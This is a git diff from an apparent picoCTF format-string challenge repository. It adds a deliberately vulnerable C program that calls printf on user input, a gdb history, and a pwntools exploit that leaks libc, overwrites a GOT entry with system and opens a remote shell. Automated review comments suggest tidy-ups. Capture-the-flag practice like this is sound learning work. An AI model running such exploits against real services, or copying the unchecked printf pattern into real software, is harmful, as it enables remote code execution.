diff --git a/format_string_2/peda-session-vuln.txt b/format_string_2/peda-session-vuln.txt
deleted file mode 100644
index fe91fea..0000000
--- a/format_string_2/peda-session-vuln.txt
+++ /dev/null
@@ -1,2 +0,0 @@
-break *main+95
-
diff --git a/format_string_3/.gdb_history b/format_string_3/.gdb_history
new file mode 100644
index 0000000..071f7d0
--- /dev/null
+++ b/format_string_3/.gdb_history
@@ -0,0 +1,89 @@
+exit
+exit
+exit
+run
+exit
+disassemble main
+b *main+16
+b *main+160
+rm
+b
+b --info
+help b
+help breakpoints
+exit
+disassemble main
+b *main+160
+run
+continue
+continue < payload
+run < payload
+continue
+con
+cont
+contin
+run < payload
+continue
+disassemble main
+b *main+175
+run < payload
+continue
+continue
+got
+disassemble 0x404018
+x 0x404018
+x/8 0x404018
+x/8w 0x404018
+x/8w2 0x404018
+x/8x2 0x404018
+x/8x2 0x404018
+x/8x2 0x404018
+x/16 0x404018
+run < payload
+disassemble 0x404018
+continue
+disassemble 0x404018
+x/16 0x404018
+x *setvbuf
+search
+search --0xfa1e0ff3
+search --pointer 0xda1e0ff3
+x *puts
+search --pointer 0x7ffff7e5a3f0
+search --pointer 0x7ffff7e9bf0
+search --pointer 0x7ffff7e59bf0
+disassemble main
+x 0x404018
+plt
+got
+run < payload
+continue
+run
+x *puts
+x setvbuf
+search --pointer 0x7ffff7e59bf0
+x 0x404018
+x/2 0x404018
+x/w 0x404018
+x/d 0x404018
+x/b 0x404018
+x/g 0x404018
+x/a 0x404018
+set {int}0x404018 = 0x7ffffe5a3f0
+x/a 0x404018
+continue
+continue
+disassemble main
+x/2d x04012f2
+run
+x/2d x04012f2
+
+x/2a x04012f2
+x/2a 0x04012f2
+x/4a 0x04012f2
+continue
+continue
+run
+got
+got
+exit
diff --git a/format_string_3/format-string-3 b/format_string_3/format-string-3
new file mode 100755
index 0000000..6bc1ead
Binary files /dev/null and b/format_string_3/format-string-3 differ
diff --git a/format_string_3/format-string-3.c b/format_string_3/format-string-3.c
new file mode 100644
index 0000000..caf010c
--- /dev/null
+++ b/format_string_3/format-string-3.c
@@ -0,0 +1,31 @@
+#include
+
+#define MAX_STRINGS 32
+
+char *normal_string = "/bin/sh";
+
+void setup() {
+ setvbuf(stdin, NULL, _IONBF, 0);
+ setvbuf(stdout, NULL, _IONBF, 0);
+ setvbuf(stderr, NULL, _IONBF, 0);
+}
+
+void hello() {
+ puts("Howdy gamers!");
+ printf("Okay I'll be nice. Here's the address of setvbuf in libc: %p\n", &setvbuf);
+}
+
+int main() {
+ char *all_strings[MAX_STRINGS] = {NULL};
+ char buf[1024] = {'\0'};
+
+ setup();
+ hello();
+
+ fgets(buf, 1024, stdin);
+ printf(buf);
+
+ puts(normal_string);
+
+ return 0;
+}
diff --git a/format_string_3/format-string-3_patched b/format_string_3/format-string-3_patched
new file mode 100755
index 0000000..1c97998
Binary files /dev/null and b/format_string_3/format-string-3_patched differ
diff --git a/format_string_3/ld-linux-x86-64.so.2 b/format_string_3/ld-linux-x86-64.so.2
new file mode 100755
index 0000000..1cf2d3e
Binary files /dev/null and b/format_string_3/ld-linux-x86-64.so.2 differ
diff --git a/format_string_3/libc.so.6 b/format_string_3/libc.so.6
new file mode 100644
index 0000000..f022213
Binary files /dev/null and b/format_string_3/libc.so.6 differ
diff --git a/format_string_3/payload b/format_string_3/payload
new file mode 100644
index 0000000..9d1fa66
Binary files /dev/null and b/format_string_3/payload differ
diff --git a/format_string_3/sol.py b/format_string_3/sol.py
new file mode 100755
index 0000000..69ca304
--- /dev/null
+++ b/format_string_3/sol.py
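Review bot: `printf(buf);` in `main` hands the line read by `fgets` straight to printf as the format string, so any conversion specifiers in the input are interpreted — an uncontrolled-format-string defect; the fixed form is `printf("%s", buf);` or `fputs(buf, stdout);`. This file appears to be the challenge's own source checked in for reference (the sibling `sol.py` depends on exactly this behaviour), in which case a header comment such as `/* Challenge source, intentionally vulnerable: printf(buf) — do not "fix" */` would stop a later reader from treating it as production code. The `#include` line has no header name, which looks like extraction loss rather than the committed text; confirm it reads `<stdio.h>` in the repository. `all_strings` is declared and never used and can be dropped.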
@@ -0,0 +1,40 @@
+#!/usr/bin/env python3
+from pwn import *
+
+context.arch = "amd64"
+
+elf = ELF("libc.so.6")
+
+#conn = process(["./format-string-3_patched"])
+address = "rhea.picoctf.net"
+port = 65145
+conn = remote(address, port)
+
+conn.recvuntil(b"libc: ")
+setvbuf_base = int(conn.recvline(), 16)
+log.info(f"setvbuf base: {hex(setvbuf_base)}")
+libc_base = setvbuf_base - elf.symbols["setvbuf"]
+log.info(f"libc base: {hex(libc_base)}")
+system_base = libc_base + elf.symbols["system"]
+log.info(f"evecve base: {hex(system_base)}")
+
+def discover_offset(payload):
+ log.debug(payload)
+ #c = process(["./format-string-3_patched"])
+ c = remote(address, port)
+ c.recvlines(2)
+ c.sendline(payload)
+ res = c.recvall()
+ log.debug(res)
+ return res
+
+fmt = FmtStr(discover_offset)
+offset = fmt.offset
+
+payload = fmtstr_payload(offset, {0x404018: system_base})
+with open("payload", "wb") as f:
+ f.write(payload)
+ f.close()
+conn.sendline(payload)
+conn.interactive()
+
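Review bot: `discover_offset` opens a fresh `remote(address, port)` on every probe and never closes it, so each call made while `FmtStr(discover_offset)` runs leaks a connection for the rest of the script; add `c.close()` after `res = c.recvall()` (before the `return`). The label in `log.info(f"evecve base: {hex(system_base)}")` is both misspelt and wrong about what it prints — the value is the resolved `system` address, and neither `setvbuf_base` nor `system_base` is a base, so `log.info(f"system address: {hex(system_addr)}")` with matching renames would read correctly. `f.close()` inside the `with open("payload", "wb") as f:` block is redundant — the context manager already closes the file on exit — and should be removed. The `0x404018` literal in `fmtstr_payload` carries no comment saying which entry it denotes; a short `# TODO(author): name the symbol this address belongs to` would make the script readable without the debugger history.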